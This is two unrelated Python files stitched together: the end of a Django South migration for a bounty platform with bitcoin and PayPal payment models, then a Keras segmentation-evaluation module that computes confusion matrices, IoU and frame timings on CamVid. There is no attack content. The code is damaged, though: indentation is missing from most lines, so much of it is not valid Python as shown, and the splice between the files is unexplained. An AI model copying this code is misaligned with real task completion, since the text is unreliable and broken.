db.delete_column(u'core_issue', 'is_public_suggestion')
# Adding field 'Issue.is_sponsored'
db.add_column(u'core_issue', 'is_sponsored',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Adding field 'Issue.is_public_suggestion'
db.add_column(u'core_issue', 'is_public_suggestion',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
# Deleting field 'Issue.is_sponsored'
db.delete_column(u'core_issue', 'is_sponsored')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'bitcoin_frespo.moneysent': {
'Meta': {'object_name': 'MoneySent'},
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
'from_address': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lastChangeDate': ('django.db.models.fields.DateTimeField', [], {}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'to_address': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'transaction_hash': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'value': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '8'})
},
u'bitcoin_frespo.receiveaddress': {
'Meta': {'object_name': 'ReceiveAddress'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'available': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.actionlog': {
'Meta': {'object_name': 'ActionLog'},
'action': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
'entity': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Issue']", 'null': 'True'}),
'issue_comment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.IssueComment']", 'null': 'True'}),
'new_json': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'offer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Offer']", 'null': 'True'}),
'old_json': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'payment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Payment']", 'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Project']", 'null': 'True'}),
'solution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Solution']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True'})
},
u'core.issue': {
'Meta': {'object_name': 'Issue'},
'createdByUser': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_feedback': ('django.db.models.fields.BooleanField', [], {}),
'is_sponsored': ('django.db.models.fields.BooleanField', [], {}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Project']", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
'trackerURL': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'trackerURL_noprotocol': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'updatedDate': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
u'core.issuecomment': {
'Meta': {'object_name': 'IssueComment'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'content': ('django.db.models.fields.TextField', [], {}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Issue']"})
},
u'core.issuecommenthistevent': {
'Meta': {'object_name': 'IssueCommentHistEvent'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.IssueComment']"}),
'content': ('django.db.models.fields.TextField', [], {}),
'event': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'eventDate': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'core.offer': {
'Meta': {'object_name': 'Offer'},
'acceptanceCriteria': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
'currency': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'expirationDate': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Issue']"}),
'lastChangeDate': ('django.db.models.fields.DateTimeField', [], {}),
'no_forking': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '8'}),
'require_release': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'sponsor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'core.offercomment': {
'Meta': {'object_name': 'OfferComment'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'content': ('django.db.models.fields.TextField', [], {}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'offer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Offer']"})
},
u'core.offercommenthistevent': {
'Meta': {'object_name': 'OfferCommentHistEvent'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.OfferComment']"}),
'content': ('django.db.models.fields.TextField', [], {}),
'event': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'eventDate': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'core.payment': {
'Meta': {'object_name': 'Payment'},
'bitcoin_fee': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '16', 'decimal_places': '8'}),
'bitcoin_receive_address': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bitcoin_frespo.ReceiveAddress']", 'null': 'True'}),
'bitcoin_transaction_hash': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'confirm_key': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
'currency': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'fee': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '8'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lastChangeDate': ('django.db.models.fields.DateTimeField', [], {}),
'offer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Offer']"}),
'offer2payment_suggested_rate': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '16', 'decimal_places': '8'}),
'offer_currency': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'paykey': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'total': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '8'}),
'total_bitcoin_received': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '16', 'decimal_places': '8'}),
'usd2payment_rate': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '16', 'decimal_places': '8'})
},
u'core.paymenthistevent': {
'Meta': {'object_name': 'PaymentHistEvent'},
'event': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'eventDate': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'payment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Payment']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'core.paymentpart': {
'Meta': {'object_name': 'PaymentPart'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'money_sent': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bitcoin_frespo.MoneySent']", 'null': 'True'}),
'payment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Payment']"}),
'paypalEmail': ('django.db.models.fields.EmailField', [], {'max_length': '256', 'null': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '8'}),
'programmer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'solution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Solution']"})
},
u'core.project': {
'Meta': {'object_name': 'Project'},
'createdByUser': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'homeURL': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image3x1': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'redirectto_project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Project']", 'null': 'True'}),
'trackerURL': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'core.solution': {
'Meta': {'object_name': 'Solution'},
'accepting_payments': ('django.db.models.fields.BooleanField', [], {}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Issue']"}),
'lastChangeDate': ('django.db.models.fields.DateTimeField', [], {}),
'programmer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'core.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'objid': ('django.db.models.fields.IntegerField', [], {}),
'objtype': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'core.userinfo': {
'Meta': {'object_name': 'UserInfo'},
'about': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'bitcoin_receive_address': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'brazilianPaypal': ('django.db.models.fields.BooleanField', [], {}),
'hide_from_userlist': ('django.db.models.fields.BooleanField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_paypal_email_verified': ('django.db.models.fields.BooleanField', [], {}),
'is_primary_email_verified': ('django.db.models.fields.BooleanField', [], {}),
'paypalEmail': ('django.db.models.fields.EmailField', [], {'max_length': '256'}),
'paypal_verified': ('django.db.models.fields.BooleanField', [], {}),
'preferred_language_code': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'realName': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'receiveAllEmail': ('django.db.models.fields.BooleanField', [], {}),
'receiveEmail_announcements': ('django.db.models.fields.BooleanField', [], {}),
'receiveEmail_issue_comments': ('django.db.models.fields.BooleanField', [], {}),
'receiveEmail_issue_offer': ('django.db.models.fields.BooleanField', [], {}),
'receiveEmail_issue_payment': ('django.db.models.fields.BooleanField', [], {}),
'receiveEmail_issue_work': ('django.db.models.fields.BooleanField', [], {}),
'screenName': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'website': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'})
},
u'core.watch': {
'Meta': {'object_name': 'Watch'},
'entity': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Issue']", 'null': 'True'}),
'objid': ('django.db.models.fields.IntegerField', [], {}),
'reason': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
}
}
complete_apps = ['core']
|
import matplotlib.pyplot as plt
import numpy as np
import cv2
import IPython
import pandas as pd
import os
import glob
import matplotlib.patches as mpatches
import keras.backend as K
import time
from matplotlib import colors
import json
import tensorflow as tf
from DataGenerators import onehot_to_mask, mask_to_onehot, load_img, img_to_array
from DataGenerators import CAMVIDImageDataGenerator
from sklearn.metrics import confusion_matrix, jaccard_similarity_score
from LabelNames import LabelNames
from skimage.measure import regionprops, label
from skimage.color import label2rgb
from PIL import Image as pil_image
def conf_matrix(preds, labels, normalized=False):
    '''Calculate the confusion matrix for one-hot encoded
    segmentation mask predictions.
    Arguments:
        preds: a numpy array of size (batch_size, height, width)
            containing the predicted class index for each pixel
        labels: a numpy array of size (batch_size, height, width, classes)
            containing the one-hot encoded ground truth
        normalized: if True, normalize each column of the matrix
    Returns:
        A confusion matrix of size classes x classes
        (column-normalized when `normalized` is True)
    '''
preds = preds.astype(int)
labels = labels.astype(int)
    assert len(labels.shape) in (3, 4) and len(preds.shape) in (3, 4)
b, h, w, c = np.shape(labels)
    # Flatten observations into the shape expected by confusion_matrix
pr = preds
la = np.argmax(labels, axis=3)
x = np.reshape(pr, (b, h*w))
y = np.reshape(la, (b, h*w))
conf_mat = np.zeros((c, c), dtype=int)
# Create confusion matrix for each image in batch
for batch in range(b):
cx = x[batch] # current batch
cy = y[batch] # current batch
conf_mat += confusion_matrix(cx,
cy,
labels=np.arange(c))
conf_mat_return = conf_mat
if normalized:
sums = np.sum(conf_mat, axis=0)
conf_mat_norm = conf_mat.astype(np.float32) / sums[np.newaxis, :]
conf_mat_return = conf_mat_norm
return conf_mat_return
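# A minimal usage sketch for conf_matrix, on dummy data (shapes as in the
# docstring above: preds are class-index masks, labels are one-hot encoded):
#   dummy_labels = np.zeros((1, 2, 2, 3))        # batch=1, 2x2 image, 3 classes
#   dummy_labels[0, :, :, 0] = 1                 # ground truth: class 0 everywhere
#   dummy_preds = np.zeros((1, 2, 2), dtype=int) # prediction: class 0 everywhere
#   cm = conf_matrix(dummy_preds, dummy_labels)  # 3x3 matrix with 4 counts in cell (0, 0)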
def safe_divide(a, b):
"""
Avoid divide by zero
http://stackoverflow.com/questions/26248654/numpy-return-0-with-divide-by-zero
"""
with np.errstate(divide='ignore', invalid='ignore'):
c = np.true_divide(a, b)
c[c == np.inf] = 0
c = np.nan_to_num(c)
return c
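# Example (sketch): safe_divide(np.array([1.0, 2.0]), np.array([0.0, 4.0]))
# returns array([0. , 0.5]) instead of propagating inf/nan from the zero division.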
class EvaluateModel():
    '''Ease the process of evaluating a model, e.g. LaTeX overview tables
    of timings, performance, CV folds, visualisation of predictions, etc.'''
def __init__(self, model, experiment):
self.model = model
self.experiment = experiment
self.predictions = None
self.images = None
self.labels = None
self.static_predictions_plot = None
self.total_n = None
self.timings_tf = []
self.timings_K = []
self.static_images_idx = [0, 10, 20]
self.no_parameters = self.get_no_parameters()
self.no_images_used_for_timings = 0
self.normalization = self.experiment.datagen_args["featurewise_center"] and self.experiment.datagen_args["featurewise_std_normalization"]
self._get_label_names()
self.generate_report_output()
def _save_json(self):
dump = {"label_names": self.label_names,
"confusion_mat": self.confusion_mat.tolist(),
"support": self.support.tolist(),
"precision": self.precision.tolist(),
"recall": self.recall.tolist(),
"f1": self.f1.tolist(),
"avg_accuracy": self.avg_accuracy,
"timings_tf": self.timings_tf.tolist(),
"timings_K": self.timings_K.tolist()
}
path = os.path.dirname(self.experiment.experiment_name)
with open(path + "/scores.json", "w") as fp:
json.dump(dump, fp)
def _get_label_names(self):
ln = LabelNames()
if self.experiment.eval_data == "camvid":
self.label_names = ln.camvid_void.keys()
elif self.experiment.eval_data == "vrinno":
self.label_names = ln.vrinno.keys()
def plot_training(self):
val_avg = "val_avg_IOU_12" if self.experiment.eval_data == "camvid" else "val_avg_IOU_4"
# Build data from tensorboard log
path = os.path.join(os.path.dirname(self.experiment.experiment_name), "decoder")
loss, mIOU, acc= [], [], []
epochs = 1
path_log_file = glob.glob(path + "/*events*")
if len(path_log_file) == 1:
for e in tf.train.summary_iterator(path_log_file[0]):
for v in e.summary.value:
if v.tag == 'loss':
loss.append(v.simple_value)
if v.tag == val_avg:
mIOU.append(v.simple_value)
if v.tag == "val_acc":
acc.append(v.simple_value)
# Create dataframe
loss = np.array(loss)
loss = (loss-min(loss))/(max(loss)-min(loss))
df = pd.DataFrame(np.array([loss, mIOU, acc]).T, columns=["Test loss","Validation mIoU","Validation accuracy"])
out_plot = df.plot()
max_v, indx = np.max(mIOU), np.argmax(mIOU)
plt.plot(indx, max_v, 'or')
out_plot.figure.savefig(os.path.join(path, "train_process_decoder.png"))
# If we train encoder-decoder style there should be something in /encoder log as well
path = os.path.join(os.path.dirname(self.experiment.experiment_name), "encoder")
loss, mIOU, acc= [], [], []
epochs = 1
path_log_file = glob.glob(path + "/*events*")
if len(path_log_file) == 1:
for e in tf.train.summary_iterator(path_log_file[0]):
for v in e.summary.value:
if v.tag == 'loss':
loss.append(v.simple_value)
if v.tag == val_avg:
mIOU.append(v.simple_value)
if v.tag == "val_acc":
acc.append(v.simple_value)
# Create dataframe
loss = np.array(loss)
loss = (loss-min(loss))/(max(loss)-min(loss))
df = pd.DataFrame(np.array([loss, mIOU, acc]).T, columns=["Test loss","Validation mIoU","Validation accuracy"])
out_plot = df.plot()
max_v, indx = np.max(mIOU), np.argmax(mIOU)
plt.plot(indx, max_v, 'or')
out_plot.figure.savefig(os.path.join(path, "train_process_encoder.png"))
def compute_timings(self):
print("Estimating frames per second...")
sess = K.get_session()
input_tensor = self.model.input
output_tensor = self.model.output
self.no_images_used_for_timings = self.images.shape[0]
img = self.images
for b in img:
x = np.expand_dims(b, 0)
# Time using native TensorFlow
start_time_tf = time.time()
output_tensor.eval(feed_dict={input_tensor: x}, session=sess)
time_tf = time.time()-start_time_tf
self.timings_tf.append(time_tf)
# Time using Keras
start_time_K = time.time()
self.model.predict(x)
time_K = time.time()-start_time_K
self.timings_K.append(time_K)
def generate_report_output(self):
path = os.path.dirname(self.experiment.experiment_name)
self.get_predictions()
self.get_images_and_labels() # Must be called after get_predictions()
self.visualise_predictions_static()
self.prepare_tables()
self.get_no_parameters()
self.compute_timings()
self.plot_training()
def get_no_parameters(self):
return self.model.count_params()
def prepare_tables(self):
pd.set_option('precision', 2)
print("Computing confusion matrix...")
confmatrix = conf_matrix(self.predictions,
self.labels)
self.compute_scores(confmatrix)
# Write confusion matrix to .tex table
confmat_pd = pd.DataFrame(self.confusion_mat,
columns=self.label_names,
index=self.label_names)
self.write_table(confmat_pd, "confmat.tex", index=True)
# Write 1-D score arrays to .tex tables
lst = ["support.tex", "precision.tex",
"recall.tex", "f1.tex", "IOU.tex"]
lst_att = [self.support, self.precision,
self.recall, self.f1, self.IOU]
for score, name in zip(lst_att, lst):
tmp_pd = pd.DataFrame(score)
tmp_pd = tmp_pd.T
tmp_pd.columns = self.label_names
self.write_table(tmp_pd, name, index=False)
def get_images_and_labels(self):
datagen = self.get_generator(self.total_n)
self.images, self.labels = datagen.next()
self.images = self.images.astype(np.uint8)
def get_predictions(self, batch_size=5):
# Predict in batches, as we cannot handle too much in memory
datagen = self.get_generator(batch_size)
preds = np.zeros((datagen.n,) + self.experiment.target_shape)
no_batches = int(np.ceil(datagen.n / float(batch_size)))
current_index = 0
for batch in range(no_batches):
x, y = datagen.next()
current_batch_size = x.shape[0]
print("Predicting batch {0} of {1} with size {2}".format(batch + 1,
no_batches,
current_batch_size))
if self.normalization:
x = self.normalize(x)
preds[current_index:(current_index+current_batch_size)] = self.model.predict(x)
current_index += current_batch_size
self.total_n = preds.shape[0]
self.predictions = onehot_to_mask(preds)
self.heat_img = preds[self.static_images_idx]
def compute_scores(self, confusion_mat):
"""Compute scores from a confusion matrix.
# Arguments
confusion_mat: a 2D array of size [nb_labels, nb_labels]
containing a confusion matrix
"""
        # The void class index is looked up below (void_idx), but it is
        # currently still included when computing the scores
self.confusion_mat = confusion_mat
print("Computing evaluation metrics...")
true_pos = np.diagonal(confusion_mat)
false_pos = np.sum(confusion_mat, axis=0) - true_pos
false_neg = np.sum(confusion_mat, axis=1) - true_pos
self.support = np.sum(confusion_mat, axis=1)
self.precision = safe_divide(true_pos, (true_pos + false_pos))
self.recall = safe_divide(true_pos, (true_pos + false_neg))
self.f1 = 2 * safe_divide((self.precision * self.recall),
(self.precision + self.recall))
self.IOU = safe_divide(true_pos, (true_pos+false_pos+false_neg))
void_idx = self.label_names.index("void")
self.avg_IOU = np.mean(self.IOU)
self.avg_accuracy = np.sum(true_pos) / float(np.sum(self.support))
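    # Worked example (sketch) of the per-class metrics above for a 2-class
    # confusion matrix [[8, 2], [1, 9]] (support taken along rows, as above):
    #   true_pos  = [8, 9]
    #   false_pos = column sums - true_pos = [1, 2]
    #   false_neg = row sums    - true_pos = [2, 1]
    #   precision = [8/9, 9/11], recall = [8/10, 9/10], IOU = [8/11, 9/12]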
def visualise_predictions_static(self, show=False):
print("Saving evaluation prediction and ground truth...")
image_index = np.random.randint(self.total_n)
pred = self.predictions[image_index]
x = self.images[image_index]
y = onehot_to_mask(self.labels[image_index])
label_colors = self._get_label_colors() / float(255)
cmap = colors.ListedColormap(label_colors)
bounds = np.arange(self.experiment.nb_classes)
norm = colors.BoundaryNorm(bounds, cmap.N)
fig = plt.figure(1)
ax = plt.subplot(311)
ax.imshow(np.squeeze(x))
ax.axis('off')
ax = plt.subplot(312)
ax.imshow(y, cmap=cmap, norm=norm)
ax.axis('off')
ax = plt.subplot(313)
ax.imshow(pred, cmap=cmap, norm=norm)
ax.axis('off')
plt.tight_layout(h_pad=0.01)
self.make_legend(label_colors,
self.label_names)
self.static_predictions_plot = fig
if show:
plt.show()
def predict_and_save_from_path(self, path, alpha=0.72):
allfiles = [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))]
images = [img for img in allfiles if img.endswith(".jpeg")]
images = sorted(images)
print("Found {} images...".format(len(images)))
label_colors = self._get_label_colors() / float(255)
cmap = colors.ListedColormap(label_colors)
bounds = np.arange(self.experiment.nb_classes + 1)
norm = colors.BoundaryNorm(bounds, cmap.N)
ctr = 1
for img_file in images:
print("Saving {0} of {1} predictions...".format(ctr, len(images)))
ctr += 1
img_path = os.path.join(path, img_file)
x = load_img(img_path, target_size=(360, 480))
x = img_to_array(x)
x_norm = x.astype(np.float32)
x_norm = np.expand_dims(x_norm, 0)
x_norm = self.normalize(x_norm)
pred = self.model.predict(x_norm)
pred = onehot_to_mask(pred)
plt.clf()
plt.imshow(np.squeeze(x))
plt.imshow(np.squeeze(pred), cmap=cmap, norm=norm, alpha=alpha)
# plt.annotate(tim_show, xy=(mid, bottom), xytext=(mid, bottom))
plt.axis('off')
plt.margins(0, 0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.savefig(os.path.join(os.path.join(path, "preds"), img_file), bbox_inches='tight', pad_inches=0)
plt.clf()
def get_bbox(self, region_area=50):
img = self.images[0]
pred = self.predictions[0]
label_image = label(pred)
image_label_overlay = label2rgb(label_image,
bg_label=0,
image=img)
fig, ax = plt.subplots(figsize=(10, 6))
ax.imshow(image_label_overlay)
for region in regionprops(label_image):
if region.area >= region_area:
minr, minc, maxr, maxc = region.bbox
rect = mpatches.Rectangle((minc, minr), maxc - minc, maxr - minr,
fill=False, edgecolor='red', linewidth=2)
ax.add_patch(rect)
ax.set_axis_off()
plt.tight_layout()
plt.show(block=False)
def save_predictions(self, alpha=0.72, no_images=None):
        '''Save the predictions as an overlay on the input images'''
# Define paths
path = os.path.dirname(self.experiment.experiment_name)
path = os.path.join(path, "preds")
# Get data
x_batch, y_batch = self.images, self.labels
# Standard save all images
if not no_images:
no_images = x_batch.shape[0]
# Define plotting specs
label_colors = self._get_label_colors() / float(255)
cmap = colors.ListedColormap(label_colors)
bounds = np.arange(self.experiment.nb_classes + 1)
norm = colors.BoundaryNorm(bounds, cmap.N)
# Get the computed timings to show in the images
timings = np.round(np.divide(1, self.timings_tf), 1)
        # Timings should have the same length as x_batch.shape[0]
assert x_batch.shape[0] == len(timings)
# Get shapes for annotating text
mid = x_batch.shape[2]/2-30
bottom = 10
# Begin looping
for i in range(no_images):
print("Saving image {0} of {1}...".format(i+1, no_images))
y = onehot_to_mask(y_batch[i])
x = x_batch[i]
pred = self.predictions[i]
imname = os.path.join(path, str(i) + ".png")
tim = timings[i]
tim_show = "FPS: " + str(tim)
plt.figure()
plt.imshow(x)
plt.imshow(pred, cmap=cmap, norm=norm, alpha=alpha)
plt.annotate(tim_show, xy=(mid, bottom), xytext=(mid, bottom))
plt.axis('off')
plt.margins(0, 0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.savefig(imname, bbox_inches='tight', pad_inches=0)
plt.clf()
def save_predictions_as_mask(self):
path = os.path.dirname(self.experiment.experiment_name)
path = os.path.join(path, "preds")
label_colors = self._get_label_colors() / float(255)
cmap = colors.ListedColormap(label_colors)
bounds = np.arange(self.experiment.nb_classes + 1)
norm = colors.BoundaryNorm(bounds, cmap.N)
for i, img in enumerate(self.predictions):
imname = os.path.join(path, str(i) + ".png")
plt.figure()
plt.imshow(img, cmap=cmap, norm=norm)
plt.axis('off')
plt.margins(0, 0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.savefig(imname, bbox_inches='tight', pad_inches=0)
plt.clf()
plt.close('all')
def save_ground_truth_as_mask(self):
path = os.path.dirname(self.experiment.experiment_name)
path = os.path.join(path, "preds")
label_colors = self._get_label_colors() / float(255)
cmap = colors.ListedColormap(label_colors)
bounds = np.arange(self.experiment.nb_classes + 1)
norm = colors.BoundaryNorm(bounds, cmap.N)
for i, img in enumerate(self.labels):
imname = os.path.join(path, str(i) + "_mask.png")
img = onehot_to_mask(img)
plt.figure()
plt.imshow(img, cmap=cmap, norm=norm)
plt.axis('off')
plt.margins(0, 0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
